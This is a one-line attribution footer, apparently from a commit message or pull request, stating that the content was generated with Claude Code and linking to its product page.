🤖 Generated with [Claude Code](https://claude.com/claude-code)
